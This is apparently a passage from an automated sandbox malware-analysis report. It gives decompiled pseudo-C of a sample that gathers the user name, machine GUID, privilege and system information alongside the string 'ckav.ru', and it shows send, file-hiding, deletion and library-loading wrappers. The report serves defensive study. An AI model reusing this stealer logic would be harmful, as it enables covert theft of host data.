				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}

0x00412d31
0x00412d34
0x00412d39
0x00412d3c
0x00412d49
0x00412d50
0x00412d52
0x00412f24
0x00412f24
0x00412f2b
0x00412f30
0x00412f32
0x00412f37
0x00412f41
0x00412f53
0x00412f53
0x00412f5b
0x00412f60
0x00412d58
0x00412d58
0x00412d63
0x00412d6c
0x00412d73
0x00412d7e
0x00412d7f
0x00412d80
0x00412d81
0x00412d82
0x00412d8f
0x00412da1
0x00412da6
0x00412dae
0x00412db0
0x00412db1
0x00412db5
0x00412dce
0x00412dcf
0x00412dd5
0x00412dda
0x00412db7
0x00412db7
0x00412db8
0x00412dbe
0x00412dc4
0x00412dc9
0x00412dc9
0x00412de2
0x00412de4
0x00412de5
0x00412de7
0x00412de9
0x00412e02
0x00412e03
0x00412e09
0x00412e0e
0x00412deb
0x00412deb
0x00412dec
0x00412df2
0x00412df8
0x00412dfd
0x00412dfd
0x00412e11
0x00412e17
0x00412e19
0x00412e1a
0x00412e1e
0x00412e37
0x00412e38
0x00412e3e
0x00412e43
0x00412e20
0x00412e20
0x00412e21
0x00412e27
0x00412e2d
0x00412e32
0x00412e32
0x00412e4b
0x00412e4d
0x00412e4f
0x00412e7e
0x00412e8a
0x00412e8f
0x00412e51
0x00412e59
0x00412e67
0x00412e6d
0x00412e72
0x00412e72
0x00412e9e
0x00412eaf
0x00412eb4
0x00412ec0
0x00412ece
0x00412edc
0x00412eea
0x00412ef8
0x00412f0f
0x00412f14
0x00412f14
0x00412f17
0x00412f1d
0x00412f1f
0x00000000
0x00412f1f
0x00412f74

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Uniqueness

Uniqueness Score: -1.00%

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}

0x00406340
0x00406345
0x00406373
0x00406373
0x00406347
0x0040634f
0x00406354
0x00406357
0x0040635c
0x00406366
0x0040636d
0x00000000
0x00406368
0x00406368
0x00406368
0x00406366
0x0040637a

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Uniqueness

Uniqueness Score: -1.00%

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}

0x00406094
0x004060a8
0x004060ab

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}

0x00402c10
0x00402c15
0x00402c1b
0x00402c1e

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}

0x00404a56
0x00404a65
0x00404a6a
0x00404ad1
0x00404ad1
0x00404a6c
0x00404a71
0x00404a79
0x00404a85
0x00404a9a
0x00404a9e
0x00404acb
0x00000000
0x00404aa0
0x00404aac
0x00404abc
0x00404ac1
0x00404ac6
0x00404ac6
0x00404a9e
0x00404ad9

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}

0x004060c6
0x004060d5
0x004060d8
0x004060f4
0x004060f6
0x004060fb
0x0040610a
0x00406115
0x0040611c
0x0040611e
0x00406121
0x00000000
0x0040612a
0x0040612f

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Uniqueness

Uniqueness Score: -1.00%

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}

0x00403c68
0x00403c70
0x00403c78
0x00403c82
0x00403c8b
0x00403c8f
0x00403c72
0x00403c76
0x00403c76

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Uniqueness

Uniqueness Score: -1.00%

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}

0x0040643c
0x00406445
0x00406454

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Uniqueness

Uniqueness Score: -1.00%

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}

0x00404eed
0x00404ef2
0x00404efd
0x00404efd
0x00404f07
0x00404f0e

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Uniqueness

Uniqueness Score: -1.00%

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}

0x00403bdd
0x00403beb
0x00403bee

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}

0x0040428a
0x00404297
0x0040429a

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}

0x00404a27
0x00404a35
0x00404a38

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}

0x00403c4d
0x00403c55
0x00403c58

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}

0x00403c15
0x00403c1d
0x00403c20

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}

0x00402c2c
0x00402c34
0x00402c37

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

